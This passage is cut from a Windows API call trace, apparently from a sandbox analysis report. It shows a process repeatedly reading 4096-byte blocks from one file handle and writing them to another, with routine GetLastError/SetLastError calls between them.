lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.426] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.426] GetLastError () returned 0x0 [0079.426] SetLastError (dwErrCode=0x0) [0079.426] GetLastError () returned 0x0 [0079.426] SetLastError (dwErrCode=0x0) [0079.426] GetLastError () returned 0x0 [0079.426] SetLastError (dwErrCode=0x0) [0079.426] GetLastError () returned 0x0 [0079.426] SetLastError (dwErrCode=0x0) [0079.426] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.426] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.426] GetLastError () returned 0x0 [0079.426] SetLastError (dwErrCode=0x0) [0079.426] GetLastError () returned 0x0 [0079.426] SetLastError (dwErrCode=0x0) [0079.427] GetLastError () returned 0x0 [0079.427] SetLastError (dwErrCode=0x0) [0079.427] GetLastError () returned 0x0 [0079.427] SetLastError (dwErrCode=0x0) [0079.427] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.427] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.427] GetLastError () returned 0x0 [0079.427] SetLastError (dwErrCode=0x0) [0079.427] GetLastError () returned 0x0 [0079.427] SetLastError (dwErrCode=0x0) [0079.427] GetLastError () returned 0x0 [0079.427] SetLastError (dwErrCode=0x0) [0079.427] GetLastError () returned 0x0 [0079.427] SetLastError (dwErrCode=0x0) [0079.427] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.427] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.427] GetLastError () returned 0x0 [0079.427] SetLastError (dwErrCode=0x0) [0079.428] GetLastError () returned 0x0 [0079.428] SetLastError (dwErrCode=0x0) [0079.428] GetLastError () returned 0x0 [0079.428] SetLastError (dwErrCode=0x0) [0079.428] GetLastError () returned 0x0 [0079.428] SetLastError (dwErrCode=0x0) [0079.428] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.428] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.428] GetLastError () returned 0x0 [0079.428] SetLastError (dwErrCode=0x0) [0079.428] GetLastError () returned 0x0 [0079.428] SetLastError (dwErrCode=0x0) [0079.428] GetLastError () returned 0x0 [0079.428] SetLastError (dwErrCode=0x0) [0079.428] GetLastError () returned 0x0 [0079.428] SetLastError (dwErrCode=0x0) [0079.428] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.428] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.428] GetLastError () returned 0x0 [0079.429] SetLastError (dwErrCode=0x0) [0079.429] GetLastError () returned 0x0 [0079.429] SetLastError (dwErrCode=0x0) [0079.429] GetLastError () returned 0x0 [0079.429] SetLastError (dwErrCode=0x0) [0079.429] GetLastError () returned 0x0 [0079.429] SetLastError (dwErrCode=0x0) [0079.429] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.429] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.429] GetLastError () returned 0x0 [0079.429] SetLastError (dwErrCode=0x0) [0079.429] GetLastError () returned 0x0 [0079.429] SetLastError (dwErrCode=0x0) [0079.429] GetLastError () returned 0x0 [0079.429] SetLastError (dwErrCode=0x0) [0079.429] GetLastError () returned 0x0 [0079.429] SetLastError (dwErrCode=0x0) [0079.429] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.429] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.430] GetLastError () returned 0x0 [0079.430] SetLastError (dwErrCode=0x0) [0079.430] GetLastError () returned 0x0 [0079.430] SetLastError (dwErrCode=0x0) [0079.430] GetLastError () returned 0x0 [0079.430] SetLastError (dwErrCode=0x0) [0079.430] GetLastError () returned 0x0 [0079.430] SetLastError (dwErrCode=0x0) [0079.430] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.430] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.430] GetLastError () returned 0x0 [0079.430] SetLastError (dwErrCode=0x0) [0079.430] GetLastError () returned 0x0 [0079.430] SetLastError (dwErrCode=0x0) [0079.430] GetLastError () returned 0x0 [0079.430] SetLastError (dwErrCode=0x0) [0079.430] GetLastError () returned 0x0 [0079.430] SetLastError (dwErrCode=0x0) [0079.430] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.430] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.431] GetLastError () returned 0x0 [0079.431] SetLastError (dwErrCode=0x0) [0079.431] GetLastError () returned 0x0 [0079.431] SetLastError (dwErrCode=0x0) [0079.431] GetLastError () returned 0x0 [0079.431] SetLastError (dwErrCode=0x0) [0079.431] GetLastError () returned 0x0 [0079.549] SetLastError (dwErrCode=0x0) [0079.549] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.552] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.562] GetLastError () returned 0x0 [0079.562] SetLastError (dwErrCode=0x0) [0079.564] GetLastError () returned 0x0 [0079.582] SetLastError (dwErrCode=0x0) [0079.603] GetLastError () returned 0x0 [0079.603] SetLastError (dwErrCode=0x0) [0079.603] GetLastError () returned 0x0 [0079.603] SetLastError (dwErrCode=0x0) [0079.603] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.603] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.603] GetLastError () returned 0x0 [0079.603] SetLastError (dwErrCode=0x0) [0079.603] GetLastError () returned 0x0 [0079.603] SetLastError (dwErrCode=0x0) [0079.603] GetLastError () returned 0x0 [0079.603] SetLastError (dwErrCode=0x0) [0079.603] GetLastError () returned 0x0 [0079.603] SetLastError (dwErrCode=0x0) [0079.604] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.604] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.604] GetLastError () returned 0x0 [0079.604] SetLastError (dwErrCode=0x0) [0079.604] GetLastError () returned 0x0 [0079.604] SetLastError (dwErrCode=0x0) [0079.604] GetLastError () returned 0x0 [0079.604] SetLastError (dwErrCode=0x0) [0079.604] GetLastError () returned 0x0 [0079.604] SetLastError (dwErrCode=0x0) [0079.604] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.604] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.604] GetLastError () returned 0x0 [0079.604] SetLastError (dwErrCode=0x0) [0079.604] GetLastError () returned 0x0 [0079.604] SetLastError (dwErrCode=0x0) [0079.604] GetLastError () returned 0x0 [0079.604] SetLastError (dwErrCode=0x0) [0079.605] GetLastError () returned 0x0 [0079.605] SetLastError (dwErrCode=0x0) [0079.605] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.605] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.605] GetLastError () returned 0x0 [0079.605] SetLastError (dwErrCode=0x0) [0079.605] GetLastError () returned 0x0 [0079.605] SetLastError (dwErrCode=0x0) [0079.605] GetLastError () returned 0x0 [0079.605] SetLastError (dwErrCode=0x0) [0079.605] GetLastError () returned 0x0 [0079.605] SetLastError (dwErrCode=0x0) [0079.605] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.605] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.605] GetLastError () returned 0x0 [0079.605] SetLastError (dwErrCode=0x0) [0079.605] GetLastError () returned 0x0 [0079.605] SetLastError (dwErrCode=0x0) [0079.606] GetLastError () returned 0x0 [0079.606] SetLastError (dwErrCode=0x0) [0079.606] GetLastError () returned 0x0 [0079.606] SetLastError (dwErrCode=0x0) [0079.606] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.606] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.606] GetLastError () returned 0x0 [0079.606] SetLastError (dwErrCode=0x0) [0079.606] GetLastError () returned 0x0 [0079.606] SetLastError (dwErrCode=0x0) [0079.606] GetLastError () returned 0x0 [0079.606] SetLastError (dwErrCode=0x0) [0079.606] GetLastError () returned 0x0 [0079.606] SetLastError (dwErrCode=0x0) [0079.606] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.606] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.606] GetLastError () returned 0x0 [0079.606] SetLastError (dwErrCode=0x0) [0079.606] GetLastError () returned 0x0 [0079.606] SetLastError (dwErrCode=0x0) [0079.607] GetLastError () returned 0x0 [0079.607] SetLastError (dwErrCode=0x0) [0079.607] GetLastError () returned 0x0 [0079.607] SetLastError (dwErrCode=0x0) [0079.607] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.607] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.607] GetLastError () returned 0x0 [0079.607] SetLastError (dwErrCode=0x0) [0079.607] GetLastError () returned 0x0 [0079.607] SetLastError (dwErrCode=0x0) [0079.607] GetLastError () returned 0x0 [0079.607] SetLastError (dwErrCode=0x0) [0079.607] GetLastError () returned 0x0 [0079.607] SetLastError (dwErrCode=0x0) [0079.607] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.607] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.607] GetLastError () returned 0x0 [0079.607] SetLastError (dwErrCode=0x0) [0079.607] GetLastError () returned 0x0 [0079.607] SetLastError (dwErrCode=0x0) [0079.608] GetLastError () returned 0x0 [0079.608] SetLastError (dwErrCode=0x0) [0079.608] GetLastError () returned 0x0 [0079.608] SetLastError (dwErrCode=0x0) [0079.608] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.608] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.608] GetLastError () returned 0x0 [0079.608] SetLastError (dwErrCode=0x0) [0079.608] GetLastError () returned 0x0 [0079.608] SetLastError (dwErrCode=0x0) [0079.608] GetLastError () returned 0x0 [0079.608] SetLastError (dwErrCode=0x0) [0079.608] GetLastError () returned 0x0 [0079.608] SetLastError (dwErrCode=0x0) [0079.608] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.608] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.608] GetLastError () returned 0x0 [0079.608] SetLastError (dwErrCode=0x0) [0079.609] GetLastError () returned 0x0 [0079.609] SetLastError (dwErrCode=0x0) [0079.609] GetLastError () returned 0x0 [0079.609] SetLastError (dwErrCode=0x0) [0079.609] GetLastError () returned 0x0 [0079.609] SetLastError (dwErrCode=0x0) [0079.609] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.611] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.612] GetLastError () returned 0x0 [0079.612] SetLastError (dwErrCode=0x0) [0079.612] GetLastError () returned 0x0 [0079.612] SetLastError (dwErrCode=0x0) [0079.612] GetLastError () returned 0x0 [0079.612] SetLastError (dwErrCode=0x0) [0079.612] GetLastError () returned 0x0 [0079.612] SetLastError (dwErrCode=0x0) [0079.612] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.612] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.612] GetLastError () returned 0x0 [0079.612] SetLastError (dwErrCode=0x0) [0079.612] GetLastError () returned 0x0 [0079.612] SetLastError (dwErrCode=0x0) [0079.612] GetLastError () returned 0x0 [0079.612] SetLastError (dwErrCode=0x0) [0079.613] GetLastError () returned 0x0 [0079.613] SetLastError (dwErrCode=0x0) [0079.613] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.613] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.613] GetLastError () returned 0x0 [0079.613] SetLastError (dwErrCode=0x0) [0079.613] GetLastError () returned 0x0 [0079.613] SetLastError (dwErrCode=0x0) [0079.613] GetLastError () returned 0x0 [0079.613] SetLastError (dwErrCode=0x0) [0079.613] GetLastError () returned 0x0 [0079.613] SetLastError (dwErrCode=0x0) [0079.613] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.613] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.613] GetLastError () returned 0x0 [0079.613] SetLastError (dwErrCode=0x0) [0079.613] GetLastError () returned 0x0 [0079.613] SetLastError (dwErrCode=0x0) [0079.614] GetLastError () returned 0x0 [0079.614] SetLastError (dwErrCode=0x0) [0079.614] GetLastError () returned 0x0 [0079.614] SetLastError (dwErrCode=0x0) [0079.614] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.614] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.614] GetLastError () returned 0x0 [0079.614] SetLastError (dwErrCode=0x0) [0079.614] GetLastError () returned 0x0 [0079.614] SetLastError (dwErrCode=0x0) [0079.614] GetLastError () returned 0x0 [0079.614] SetLastError (dwErrCode=0x0) [0079.614] GetLastError () returned 0x0 [0079.614] SetLastError (dwErrCode=0x0) [0079.614] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.614] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.614] GetLastError () returned 0x0 [0079.614] SetLastError (dwErrCode=0x0) [0079.615] GetLastError () returned 0x0 [0079.615] SetLastError (dwErrCode=0x0) [0079.615] GetLastError () returned 0x0 [0079.615] SetLastError (dwErrCode=0x0) [0079.615] GetLastError () returned 0x0 [0079.615] SetLastError (dwErrCode=0x0) [0079.615] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.615] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.615] GetLastError () returned 0x0 [0079.615] SetLastError (dwErrCode=0x0) [0079.615] GetLastError () returned 0x0 [0079.615] SetLastError (dwErrCode=0x0) [0079.615] GetLastError () returned 0x0 [0079.615] SetLastError (dwErrCode=0x0) [0079.615] GetLastError () returned 0x0 [0079.615] SetLastError (dwErrCode=0x0) [0079.615] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.615] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.616] GetLastError () returned 0x0 [0079.616] SetLastError (dwErrCode=0x0) [0079.616] GetLastError () returned 0x0 [0079.616] SetLastError (dwErrCode=0x0) [0079.616] GetLastError () returned 0x0 [0079.616] SetLastError (dwErrCode=0x0) [0079.616] GetLastError () returned 0x0 [0079.616] SetLastError (dwErrCode=0x0) [0079.616] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.616] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.616] GetLastError () returned 0x0 [0079.616] SetLastError (dwErrCode=0x0) [0079.616] GetLastError () returned 0x0 [0079.616] SetLastError (dwErrCode=0x0) [0079.616] GetLastError () returned 0x0 [0079.616] SetLastError (dwErrCode=0x0) [0079.616] GetLastError () returned 0x0 [0079.616] SetLastError (dwErrCode=0x0) [0079.616] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.616] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.617] GetLastError () returned 0x0 [0079.617] SetLastError (dwErrCode=0x0) [0079.617] GetLastError () returned 0x0 [0079.617] SetLastError (dwErrCode=0x0) [0079.617] GetLastError () returned 0x0 [0079.617] SetLastError (dwErrCode=0x0) [0079.617] GetLastError () returned 0x0 [0079.617] SetLastError (dwErrCode=0x0) [0079.617] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.617] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, 